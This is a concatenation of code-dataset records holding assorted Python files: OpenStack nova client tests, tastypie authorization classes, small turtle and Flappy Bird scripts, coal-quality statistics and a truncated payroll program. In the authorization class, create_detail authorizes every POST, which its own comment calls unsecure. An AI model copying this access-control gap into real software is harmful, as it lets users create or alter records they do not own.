agentSummarys.values())\n\n plt.show()\n\nmain()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"433010999","text":"# Copyright 2014: Mirantis Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nimport mock\n\nfrom oslotest import mockpatch\n\nfrom cloudferrylib.os.compute import nova_compute\nfrom novaclient.v1_1 import client as nova_client\nfrom tests import test\n\n\nFAKE_CONFIG = {'user': 'fake_user',\n 'password': 'fake_password',\n 'tenant': 'fake_tenant',\n 'host': '1.1.1.1'}\n\n\nclass NovaComputeTestCase(test.TestCase):\n def setUp(self):\n super(NovaComputeTestCase, self).setUp()\n\n self.mock_client = mock.MagicMock()\n self.nc_patch = mockpatch.PatchObject(nova_client, 'Client',\n new=self.mock_client)\n self.useFixture(self.nc_patch)\n self.nova_client = nova_compute.NovaCompute(FAKE_CONFIG)\n\n self.fake_instance_0 = mock.Mock()\n self.fake_instance_1 = mock.Mock()\n self.fake_instance_0.id = 'fake_instance_id'\n\n self.fake_getter = mock.Mock()\n\n self.fake_flavor_0 = mock.Mock()\n self.fake_flavor_1 = mock.Mock()\n\n def test_get_nova_client(self):\n # To check self.mock_client call only from this test method\n self.mock_client.reset_mock()\n\n client = self.nova_client.get_nova_client(FAKE_CONFIG)\n\n self.mock_client.assert_called_once_with('fake_user', 'fake_password',\n 'fake_tenant',\n 'http://1.1.1.1:35357/v2.0/')\n self.assertEqual(self.mock_client(), client)\n\n def test_create_instance(self):\n self.mock_client().servers.create.return_value = self.fake_instance_0\n\n instance_id = self.nova_client.create_instance(name='fake_instance',\n image='fake_image',\n flavor='fake_flavor')\n\n self.assertEqual('fake_instance_id', instance_id)\n\n def test_get_instances_list(self):\n fake_instances_list = [self.fake_instance_0, self.fake_instance_1]\n self.mock_client().servers.list.return_value = fake_instances_list\n\n instances_list = self.nova_client.get_instances_list()\n\n test_args = {'marker': None,\n 'detailed': True,\n 'limit': None,\n 'search_opts': None}\n self.mock_client().servers.list.assert_called_once_with(**test_args)\n self.assertEqual(fake_instances_list, instances_list)\n\n def test_get_status(self):\n self.fake_getter.get('fake_id').status = 'start'\n\n status = self.nova_client.get_status(self.fake_getter, 'fake_id')\n\n self.assertEqual('start', status)\n\n def test_change_status_start(self):\n self.nova_client.change_status('start', instance=self.fake_instance_0)\n self.fake_instance_0.start.assert_called_once_with()\n\n def test_change_status_stop(self):\n self.nova_client.change_status('stop', instance=self.fake_instance_0)\n self.fake_instance_0.stop.assert_called_once_with()\n\n def test_change_status_resume(self):\n self.nova_client.change_status('resume', instance=self.fake_instance_0)\n self.fake_instance_0.resume.assert_called_once_with()\n\n def test_change_status_paused(self):\n self.nova_client.change_status('paused', instance=self.fake_instance_0)\n self.fake_instance_0.pause.assert_called_once_with()\n\n def test_change_status_unpaused(self):\n self.nova_client.change_status('unpaused',\n instance=self.fake_instance_0)\n self.fake_instance_0.unpause.assert_called_once_with()\n\n def test_change_status_suspend(self):\n self.nova_client.change_status('suspend',\n instance=self.fake_instance_0)\n self.fake_instance_0.suspend.assert_called_once_with()\n\n def test_change_status_same(self):\n self.mock_client().servers.get('fake_instance_id').status = 'stop'\n\n self.nova_client.change_status('stop', instance=self.fake_instance_0)\n self.assertFalse(self.fake_instance_0.stop.called)\n\n def test___get_disk_path_ephemeral(self):\n fake_instance_inf = {'id': 'fake_id'}\n fake_blk_list = [\n \"compute/%s%s\" % (fake_instance_inf['id'], '_fake_disk')]\n disk_path = self.nova_client._NovaCompute__get_disk_path(\n 'fake_disk',\n fake_blk_list,\n fake_instance_inf,\n is_ceph_ephemeral=True)\n\n self.assertEqual('compute/fake_id_fake_disk', disk_path)\n\n def test_get_flavor_from_id(self):\n self.mock_client().flavors.get.return_value = self.fake_flavor_0\n\n flavor = self.nova_client.get_flavor_from_id('fake_flavor_id')\n\n self.assertEqual(self.fake_flavor_0, flavor)\n\n def test_get_flavor_list(self):\n fake_flavor_list = [self.fake_flavor_0, self.fake_flavor_1]\n self.mock_client().flavors.list.return_value = fake_flavor_list\n\n flavor_list = self.nova_client.get_flavor_list()\n\n self.assertEqual(fake_flavor_list, flavor_list)\n\n def test_create_flavor(self):\n self.mock_client().flavors.create.return_value = self.fake_flavor_0\n\n flavor = self.nova_client.create_flavor()\n\n self.assertEqual(self.fake_flavor_0, flavor)\n\n def test_delete_flavor(self):\n self.nova_client.delete_flavor('fake_fl_id')\n\n self.mock_client().flavors.delete.assert_called_once_with('fake_fl_id')\n","sub_path":"tests/cloudferrylib/os/compute/test_nova.py","file_name":"test_nova.py","file_ext":"py","file_size_in_byte":6049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"198001693","text":"from tastypie.authorization import Authorization\nfrom tastypie.exceptions import Unauthorized\n\n\n# adapted from http://django-tastypie.readthedocs.org/en/latest/authorization.html\n#\n# Usage:\n# class ApiResource(ModelResource):\n# class Meta:\n# queryset = model_name.objects.all()\n# authorization = OwnerAuthorization('model_owner_attribute')\n#\n# TODO: This class is duplicated in mrvapi/v1.py and can be consolidated to one Django application\nclass OwnerAuthorization(Authorization):\n def __init__(self, filter):\n # This Authorization class receives a string in the constructor\n # This string identifies the object member that should be compared against bundle.request.user\n self.filter = filter\n self.filter_list = filter.split('__')\n self.filter_dict = {filter: None}\n\n def read_list(self, object_list, bundle):\n # This assumes a ``QuerySet`` from ``ModelResource``.\n self.filter_dict[self.filter] = bundle.request.user\n return object_list.filter(**self.filter_dict)\n\n def read_detail(self, object_list, bundle):\n # Is the requested object owned by the user?\n owner = bundle.obj\n for filter in self.filter_list: # works recursively, climbing up FK relations to get owner\n owner = getattr(owner, filter)\n\n # while this does return False for un-authorized users, and SHOULD work according to documentation -- it does NOT.\n # return owner == bundle.request.user # This False is ignored; anyone could see object(s)\n # This comment should remain until upstream issue can be filed/reviewed by tastypie project maintainer\n # We must rather raise an exception:\n if not owner == bundle.request.user:\n raise Unauthorized(\"You do not have access to this resource.\")\n return True\n\n def create_list(self, object_list, bundle):\n # Assuming they are already assigned to ``user``.\n return object_list\n\n def create_detail(self, object_list, bundle):\n # 1- get the related owner of the object from a filter like 'parcel__project__owner'\n # owner = bundle.obj\n # for filter in self.filter_list:\n # owner = getattr(owner, filter)\n # expected result:\n # owner => bundle.obj.parcel.project.owner\n # actual result:\n # File \"C:\\python27\\lib\\site-packages\\django\\db\\models\\fields\\related.py\", line 387, in __get__\n # raise self.field.rel.to.DoesNotExist\n # DoesNotExist\n # 2- compare owner with user request\n # return owner == bundle.request.user\n\n # cannot get working, will have to authorize all POSTs in interim -- unsecure\n return True\n\n def update_list(self, object_list, bundle):\n allowed = []\n\n # Since they may not all be saved, iterate over them.\n for obj in object_list:\n if getattr(obj, self.filter) == bundle.request.user:\n allowed.append(obj)\n\n return allowed\n\n def update_detail(self, object_list, bundle):\n # Is the requested object owned by the user?\n owner = bundle.obj\n for filter in self.filter_list:\n owner = getattr(owner, filter)\n if not owner == bundle.request.user:\n raise Unauthorized(\"You do not have access to this resource.\")\n return True\n\n def delete_list(self, object_list, bundle):\n allowed = []\n\n for obj in object_list:\n if getattr(obj, self.filter) == bundle.request.user:\n allowed.append(obj)\n\n return allowed\n\n def delete_detail(self, object_list, bundle):\n # Is the requested object owned by the user?\n owner = bundle.obj\n for filter in self.filter_list:\n owner = getattr(owner, filter)\n if not owner == bundle.request.user:\n raise Unauthorized(\"You do not have access to this resource.\")\n return True\n\n\n# adapted from http://django-tastypie.readthedocs.org/en/latest/authorization.html\nclass OwnerAuthorizationWithPublic(OwnerAuthorization):\n def read_list(self, object_list, bundle):\n # This assumes a ``QuerySet`` from ``ModelResource``.\n self.filter_dict[self.filter] = bundle.request.user\n owners_list = object_list.filter(**self.filter_dict)\n public_list = object_list.filter(public=True)\n return (owners_list | public_list)\n\n def read_detail(self, object_list, bundle):\n # Is the requested object owned by the user? or is it public?\n owner = bundle.obj\n for filter in self.filter_list: # works recursively, climbing up FK relations to get owner\n owner = getattr(owner, filter)\n if (not bundle.obj.public) and (owner != bundle.request.user):\n raise Unauthorized(\"You do not have access to this resource.\")\n return True\n","sub_path":"mrvapi/v1auth.py","file_name":"v1auth.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"654026306","text":"import turtle\nimport random\nimport math\n\n\nclass ConfettiDrawer(object):\n def __init__(self):\n self.Mark = turtle.Turtle()\n self.Mark.speed(0)\n self.screen = turtle.Screen()\n self.circle_list = []\n self.circle_number = 10000\n self.radius = 25\n self.counter = 0\n self.generate_circles()\n self.screen.exitonclick()\n\n def check_intersection(self, coordinates):\n intersection = True\n for circle in self.circle_list:\n if math.sqrt((coordinates[0]-circle[0])**2 + (coordinates[1]-circle[1])**2) >= 2*self.radius:\n pass\n else:\n intersection = False\n self.counter += 1\n return intersection\n\n def generate_circles(self):\n counter = 0\n while counter < self.circle_number:\n if self.counter > self.circle_number*100:\n break\n x = random.randint(self.radius-650, 650-self.radius)\n y = random.randint(self.radius-335, 335-self.radius)\n coordinates = [x, y]\n if self.check_intersection(coordinates):\n counter += 1\n self.circle_list.append(coordinates)\n self.Mark.penup()\n self.Mark.goto(x, y)\n self.Mark.pendown()\n self.Mark.dot(self.radius*2, \"#\" + \"%06x\" % random.randint(0, 0xFFFFFF))\n\n\n\napp = ConfettiDrawer()\n","sub_path":"SmallProjects/NonOverlapping.py","file_name":"NonOverlapping.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"125877254","text":"import unittest\nimport os\nimport csv\nimport json\nfrom argparse import Namespace\nimport odybcl2fastq.util as util\nimport odybcl2fastq.run as run\nimport odybcl2fastq.parsers.parse_sample_sheet as ss\n\nclass Odybcl2fastqTests(unittest.TestCase):\n\n def setUp(self):\n self.sample_data_dir = (os.path.abspath( os.path.dirname( __file__ ) ) +\n '/sample_data/')\n\n def tearDown(self):\n pass\n\n def test_sheet_parse(self):\n sample_sheet_path = 'tests/sample_data/SampleSheet.csv'\n sample_sheet = ss.sheet_parse(sample_sheet_path)\n parts = ['Header', 'Reads', 'Settings', 'Data']\n for part in parts:\n assert (part in sample_sheet and sample_sheet[part])\n\n def test_get_instrument(self):\n run_info = 'tests/sample_data/RunInfo.xml'\n sample_sheet_path = 'tests/sample_data/SampleSheet.json'\n sample_sheet = util.load_json(sample_sheet_path)\n instrument = ss.get_instrument(sample_sheet['Data'])\n assert instrument == 'hiseq'\n\n def test_extract_basemasks(self):\n run_info = 'tests/sample_data/RunInfo.xml'\n instrument = 'hiseq'\n # json does not give ordered results\n sample_sheet_path = 'tests/sample_data/SampleSheet.csv'\n sample_sheet = ss.sheet_parse(sample_sheet_path)\n mask_lists, mask_samples = run.extract_basemasks(sample_sheet['Data'], run_info, instrument)\n mask_lists_control = {'y26,i8,y134': ['1:y26,i8,y134', '2:y26,i8,y134']}\n assert (mask_lists == mask_lists_control)\n\n def test_build_cmd(self):\n mask_list = ['1:y26,i8,y134', '2:y26,i8,y134']\n instrument = 'hiseq'\n args = Namespace(BCL_ADAPTER_STRINGENCY=0.90000000000000002, BCL_BARCODE_MISMATCHES=0,\n BCL_CREATE_INDEXREAD_FASTQ=False, BCL_FASTQ_COMPRESSION_LEVEL=4,\n BCL_FIND_ADAPTERS_SLIDING_WINDOW=False, BCL_IGNORE_MISSING_BCLS=True,\n BCL_IGNORE_MISSING_FILTER=True, BCL_IGNORE_MISSING_POSITIONS=True,\n BCL_MASK_SHORT_ADAPTER_READS=22, BCL_MINIMUM_TRIMMED_READ_LENGTH=0,\n BCL_NO_BGZF=False, BCL_NO_LANE_SPLITTING=True,\n BCL_OUTPUT_DIR='/n/ngsdata/odybcl2fastq_test/test_run',\n BCL_PROC_THREADS=8,\n BCL_RUNFOLDER_DIR='/n/boslfs/INSTRUMENTS/illumina/test_run',\n BCL_SAMPLE_SHEET='/n/boslfs/INSTRUMENTS/illumina/test_run/SampleSheet_new.csv',\n BCL_TILES=False, BCL_WITH_FAILED_READS=False,\n BCL_WRITE_FASTQ_REVCOMP=False,\n RUNINFO_XML='/n/boslfs/INSTRUMENTS/illumina/test_run/RunInfo.xml',\n TEST=True\n )\n switches_to_names = {('--with-failed-reads',): 'BCL_WITH_FAILED_READS',\n ('--adapter-stringency',): 'BCL_ADAPTER_STRINGENCY', ('-p',\n '--processing-threads'): 'BCL_PROC_THREADS', ('-o',\n '--output-dir'): 'BCL_OUTPUT_DIR',\n ('--find-adapters-with-sliding-window',):\n 'BCL_FIND_ADAPTERS_SLIDING_WINDOW',\n ('--barcode-mismatches',): 'BCL_BARCODE_MISMATCHES',\n ('--ignore-missing-positions',):\n 'BCL_IGNORE_MISSING_POSITIONS', ('--no-bgzf-compression',):\n 'BCL_NO_BGZF', ('--sample-sheet',): 'BCL_SAMPLE_SHEET',\n ('--mask-short-adapter-reads',):\n 'BCL_MASK_SHORT_ADAPTER_READS',\n ('--minimum-trimmed-read-length',):\n 'BCL_MINIMUM_TRIMMED_READ_LENGTH',\n ('--ignore-missing-bcls',): 'BCL_IGNORE_MISSING_BCLS',\n ('-R', '--runfolder-dir'): 'BCL_RUNFOLDER_DIR',\n ('--create-fastq-for-index-reads',):\n 'BCL_CREATE_INDEXREAD_FASTQ',\n ('--write-fastq-reverse-complement',):\n 'BCL_WRITE_FASTQ_REVCOMP', ('--no-lane-splitting',):\n 'BCL_NO_LANE_SPLITTING', ('--tiles',): 'BCL_TILES',\n ('--ignore-missing-filter',): 'BCL_IGNORE_MISSING_FILTER',\n ('--fastq-compression-level',):\n 'BCL_FASTQ_COMPRESSION_LEVEL'\n }\n run_type = None\n cmd_path = 'tests/sample_data/cmd.json'\n cmd_control = util.load_json(cmd_path)\n cmd = run.bcl2fastq_build_cmd(args,\n switches_to_names, mask_list, instrument, run_type)\n assert cmd == cmd_control\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/odybcl2fastq_tests.py","file_name":"odybcl2fastq_tests.py","file_ext":"py","file_size_in_byte":4461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"252464653","text":"import tensorflow as tf\nimport numpy as np\nimport cv2\nimport sys\nsys.path.append('game/')\nimport wrapped_flappy_bird as fb\n\nACTIONS = 2\nIMAGE_SIZE = 80\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nsaver = tf.train.import_meta_graph('./flappy_bird_dqn-8500000.meta')\nsaver.restore(sess, tf.train.latest_checkpoint('./'))\ngraph = tf.get_default_graph()\n\nS = graph.get_tensor_by_name('State:0')\nQ = graph.get_tensor_by_name('Q-value:0')\n\ngame_state = fb.GameState()\n\ndo_nothing = np.zeros(ACTIONS)\ndo_nothing[0] = 1\nimg, reward, terminal = game_state.frame_step(do_nothing)\nimg = cv2.cvtColor(cv2.resize(img, (IMAGE_SIZE, IMAGE_SIZE)), cv2.COLOR_BGR2GRAY)\n_, img = cv2.threshold(img, 1, 255, cv2.THRESH_BINARY)\nS0 = np.stack((img, img, img, img), axis=2)\n\nwhile True:\n Qv = sess.run(Q, feed_dict={S: [S0]})[0]\n Av = np.zeros(ACTIONS)\n Av[np.argmax(Qv)] = 1\n\n img, reward, terminal = game_state.frame_step(Av)\n img = cv2.cvtColor(cv2.resize(img, (IMAGE_SIZE, IMAGE_SIZE)), cv2.COLOR_BGR2GRAY)\n _, img = cv2.threshold(img, 1, 255, cv2.THRESH_BINARY)\n img = np.reshape(img, (IMAGE_SIZE, IMAGE_SIZE, 1))\n S0 = np.append(S0[:, :, 1:], img, axis=2)","sub_path":"my_flappy_bird/FBDQN/game/test_bird.py","file_name":"test_bird.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"527496693","text":"def coal_ecdf(coal):\n import pandas as pd\n import pathlib\n import warnings\n from ecdf import ecdf\n\n warnings\n\n # Read in Coal Qual Data on the Samples.\n fileDir = pathlib.Path(__file__).parents[2]\n samples_filename = fileDir / 'Data' / 'COALQUAL Data' / 'Coal Qual Sample Data.csv'\n trace_element_filename = fileDir / 'Data' / 'COALQUAL Data' / 'Coal Qual Trace Element Data.csv'\n ultimate_analysis_filename = fileDir / 'Data' / 'COALQUAL Data' / 'Coal Qual Ultimate Analysis Data.csv'\n\n # Note that we use skipfooter to not read in the search criteria column.\n Samples = pd.read_csv(samples_filename, header=1,\n names=['Sample_ID', 'State', 'County', 'Region', 'Field', 'Formation', 'Bed', 'Rank'],\n usecols=[0, 1, 2, 6, 7, 9, 11, 27], engine='python', skipfooter=2)\n Trace_Element = pd.read_csv(trace_element_filename, header=1, names=['Sample_ID', 'Arsenic', 'Boron', 'Bromine',\n 'Chlorides', 'Mercury', 'Lead', 'Selenium'],\n usecols=[0, 23, 27, 35, 41, 67, 95, 115], engine='python', skipfooter=2)\n Ultimate_Analysis = pd.read_csv(ultimate_analysis_filename, header=1, names=['Sample_ID', 'Sulfur', 'Heat'],\n usecols=[0, 18, 21], engine='python', skipfooter=2)\n # Merge data together\n COALQUAL = pd.merge(Samples, Trace_Element, on='Sample_ID')\n COALQUAL = pd.merge(COALQUAL, Ultimate_Analysis, on='Sample_ID')\n\n qe_Cl_All, pe_Cl_All = ecdf(COALQUAL['Chlorides'])\n qe_Br_All, pe_Br_All = ecdf(COALQUAL['Bromine'])\n\n #For Appalachian Low Sulfur Coal\n if coal == 'Appalachian Low Sulfur':\n COALQUAL = COALQUAL[(COALQUAL['Region'] == 'SOUTHERN APPALACHIAN') | (COALQUAL['Region'] == 'CENTRAL APPALACHIAN')\n | (COALQUAL['Region'] == 'NORTHERN APPALACHIAN')]\n # USGS Circular 891 defines \"low sulfur coal\" as less than 1% total sulfur (https://pubs.usgs.gov/circ/c891/glossary.htm).\n # This is identical to the standard used by the EIA.\n COALQUAL = COALQUAL[COALQUAL['Sulfur'] < 1]\n Chlorides = [x for x in COALQUAL['Chlorides'] if x != '']\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br, pe_Br = ecdf(COALQUAL['Bromine'])\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8188 #Btu/kWh\n FGD_water_treatment = 2.14e-4 #m^3/kWh\n\n # For Appalachian Medium Sulfur Coal\n elif coal == 'Appalachian Med Sulfur':\n COALQUAL = COALQUAL[(COALQUAL['Region'] == 'SOUTHERN APPALACHIAN') | (COALQUAL['Region'] == 'CENTRAL APPALACHIAN') | (COALQUAL['Region'] == 'NORTHERN APPALACHIAN')]\n COALQUAL = COALQUAL[(COALQUAL['Sulfur'] > 1) & (COALQUAL['Sulfur'] < 3)]\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br, pe_Br = ecdf(COALQUAL['Bromine'])\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8210 #Btu/kWh\n FGD_water_treatment = 2.20e-4 #m^3/kWh\n\n # For Beulah-Zap Bed Coal\n elif coal == 'Beulah-Zap':\n COALQUAL = COALQUAL[(COALQUAL['Bed'] == 'BEULAH-ZAP')]\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br = qe_Br_All\n pe_Br = pe_Br_All\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8680 #Btu/kWh\n FGD_water_treatment = 2.36e-4 #m^3/kWh\n\n # For Illinois #6 Coal\n elif coal == 'Illinois #6':\n COALQUAL = COALQUAL[(COALQUAL['Bed'] == 'HERRIN NO 6')]\n qe_Cl = qe_Cl_All\n pe_Cl = pe_Cl_All\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br, pe_Br = ecdf(COALQUAL['Bromine'])\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = (8279+8319)/2 #Btu/kWh\n FGD_water_treatment = 2.22e-4 #m^3/kWh\n\n # For ND Lignite Coal\n elif coal == 'ND Lignite':\n COALQUAL = COALQUAL[(COALQUAL['State'] == 'North Dakota') & (COALQUAL['Rank'] == 'LIGNITE')]\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br = qe_Br_All\n pe_Br = pe_Br_All\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8865 #Btu/kWh\n FGD_water_treatment = 2.39e-4 #m^3/kWh\n\n # For Pocahontas #3 Seam Coal\n elif coal == \"Pocahontas #3\":\n COALQUAL = COALQUAL[(COALQUAL['Bed'] == 'POCAHONTAS NO 3')]\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br, pe_Br = ecdf(COALQUAL['Bromine'])\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8099 #Btu/kWh\n FGD_water_treatment = 2.19e-4 #m^3/kWh\n\n # For Upper Freeport Coal\n elif coal == 'Upper Freeport':\n COALQUAL = COALQUAL[(COALQUAL['Bed'] == 'UPPER FREEPORT')]\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br, pe_Br = ecdf(COALQUAL['Bromine'])\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8104 #Btu/kWh\n FGD_water_treatment = 2.11e-4 #m^3/kWh\n\n # For WPC Utah Coal\n elif coal == 'WPC Utah':\n COALQUAL = COALQUAL[(COALQUAL['Region'] == 'SOUTHWESTERN UTAH')]\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br = qe_Br_All\n pe_Br = pe_Br_All\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8347 #Btu/kWh\n FGD_water_treatment = 2.42e-4 #m^3/kWh\n\n # For Wyodak Coal\n elif coal == 'Wyodak':\n COALQUAL = COALQUAL[(COALQUAL['Bed'] == 'WYODAK')]\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br = qe_Br_All\n pe_Br = pe_Br_All\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8192 #Btu/kWh\n FGD_water_treatment = 1.66e-4 #m^3/kWh\n\n # For Wyodak-Anderson Coal\n elif coal == 'Wyodak Anderson':\n COALQUAL = COALQUAL[(COALQUAL['Bed'] == 'WYODAK-ANDERSON')]\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br, pe_Br = ecdf(COALQUAL['Bromine'])\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8585 #Btu/kWh\n FGD_water_treatment = 2.32e-4 #m^3/kWh\n\n # For Wyoming PRB Coal\n elif coal == 'Wyoming PRB':\n COALQUAL = COALQUAL[(COALQUAL['Region'] == 'POWDER RIVER') & (COALQUAL['State'] == 'Wyoming')]\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br, pe_Br = ecdf(COALQUAL['Bromine'])\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8588 #Btu/kWh\n FGD_water_treatment = 2.28e-4 #m^3/kWh\n\n return qe_Cl, pe_Cl, qe_Se, pe_Se, qe_B, pe_B, qe_Br, pe_Br, qe_Pb, pe_Pb, qe_As, pe_As, qe_Hg, pe_Hg, qe_Heat, \\\n pe_Heat, gross_heat_rate, FGD_water_treatment\n","sub_path":"Code/user_specified_trace_element_partitioning/coal_ecdf.py","file_name":"coal_ecdf.py","file_ext":"py","file_size_in_byte":9239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"157450398","text":"#Scott Floam\n#3/28/2015\n\n#Payroll Program\n\n\ndef main():\n print(\"Payroll Program\")\n print(\"---------------------------------------------------------\")\n\n \n #Gathers the lists from a separate function\n #-------------------------------------------------\n \n employeeWages, employeeHours, employeePayRate, employeeID = lists()\n\n \n \n #Counts the number of items in each list\n #-------------------------------------------------------\n \n employeeID_counter = len(employeeID)\n \n employeePayRate_counter = len(employeePayRate)\n\n employeeHours_counter = len(employeeHours)\n\n employeeWages_counter = len(employeeWages)\n\n\n # Allows users to see a complete list of all IDs and payments \n #-------------------------------------------------------------\n \n if employeeID_counter == employeePayRate_counter and employeePayRate_counter == employeeHours_counter and employeeHours_counter == employeeWages_counter:\n\n index_range = employeePayRate_counter\n\n print()\n\n print (\"Employee ID\",'\\t', \"Hours\",'\\t\\t',\"Pay Rate\",'\\t',\"Employee Wages\")\n\n for i in range(index_range):\n\n print(employeeID[i],'\\t\\t',employeeHours[i],'\\t\\t',\"$\"+format(float(employeePayRate[i]),',.2f'),'\\t', \"$\"+format(employeeWages[i],',.2f'))\n\n print()\n\n else:\n\n print(\"These lists will not work for this program\")\n \n print()\n\n continuous_prompt = \"Y\"\n \n while continuous_prompt != \"N\" and continuous_prompt != \"n\":\n \n get_id = int(input(\"Enter an Employee ID to see his/her gross wages: \"))\n\n wage_lists(i,employeeWages)\n \n get_wages(get_id,employeeWages)\n\n print()\n \n continuous_prompt = input(\"Would you like to search another employee's gross wages again? Press enter to search again. Enter 'n' or 'N' to exit: \")\n\n print()\n \n print(\"You have opted to exit the program. Goodbye!\")\n# Allows users to Serach by individual ID #\n#-------------------------------------------\n\n\ndef get_wages(get_id,employeeWages):\n\n while get_id != 56588 and get_id != 45201 and get_id != 78951 and get_id != 87775 and get_id != 84512 and get_id != 13028 and get_id != 75804:\n print()\n print (\"You entered an invalid Employee ID number. Try again!\")\n print()\n get_id = int(input(\"Enter an Employee ID to see his/her wage: \"))\n\n\n if get_id == 56588:\n i = 0 \n employee_wage = wage_lists(i,employeeWages)\n 